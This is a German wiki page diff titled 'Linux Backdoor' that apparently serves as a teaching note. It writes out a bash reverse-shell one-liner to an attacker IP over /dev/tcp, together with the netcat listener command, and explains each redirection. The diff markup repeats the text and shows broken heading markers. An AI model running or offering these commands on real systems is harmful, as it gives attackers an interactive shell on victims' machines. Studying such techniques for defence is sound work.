Linux Backdoor: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(→&>) |
|||
| Zeile 11: | Zeile 11: | ||
Öffnet eine interaktive Shell und leitet die Ausgabe den den Socket zu 10.0.10.101:8686 | Öffnet eine interaktive Shell und leitet die Ausgabe den den Socket zu 10.0.10.101:8686 | ||
| − | = | + | ==== |
leitet die Standardausgabe und den Fehler auf den Socket um, der für die IP 10.0.10.101 geöffnet ist, die auf Port 8686 lauschen würde | leitet die Standardausgabe und den Fehler auf den Socket um, der für die IP 10.0.10.101 geöffnet ist, die auf Port 8686 lauschen würde | ||
| + | |||
=0>&1= | =0>&1= | ||
Man kann es auch 0<&1 schreiben. Dies würde buchstäblich bedeuten, dass "0" an "1" angehängt ist, was bedeutet, dass stdin an stdout angehängt ist, und aus Punkt 2 wissen wir, dass die stdin für diesen Bash-Prozess für den Angreifer verfügbar ist, der Port 8686 abhört. | Man kann es auch 0<&1 schreiben. Dies würde buchstäblich bedeuten, dass "0" an "1" angehängt ist, was bedeutet, dass stdin an stdout angehängt ist, und aus Punkt 2 wissen wir, dass die stdin für diesen Bash-Prozess für den Angreifer verfügbar ist, der Port 8686 abhört. | ||
Version vom 13. März 2023, 19:32 Uhr
Angreifer
IP Angreifer 10.0.10.101
- netcat -lp 8686
Opfer
So findet man es im Internet
- bash -i >& /dev/tcp/10.0.10.101/8686 0>&1
Für mich besser lesbar
- bash -i > /dev/tcp/10.0.10.101/8686 2>&1 0>&1
bash -i > /dev/tcp/10.0.10.101/8686
Öffnet eine interaktive Shell und leitet die Ausgabe den den Socket zu 10.0.10.101:8686
==
leitet die Standardausgabe und den Fehler auf den Socket um, der für die IP 10.0.10.101 geöffnet ist, die auf Port 8686 lauschen würde
0>&1
Man kann es auch 0<&1 schreiben. Dies würde buchstäblich bedeuten, dass "0" an "1" angehängt ist, was bedeutet, dass stdin an stdout angehängt ist, und aus Punkt 2 wissen wir, dass die stdin für diesen Bash-Prozess für den Angreifer verfügbar ist, der Port 8686 abhört.
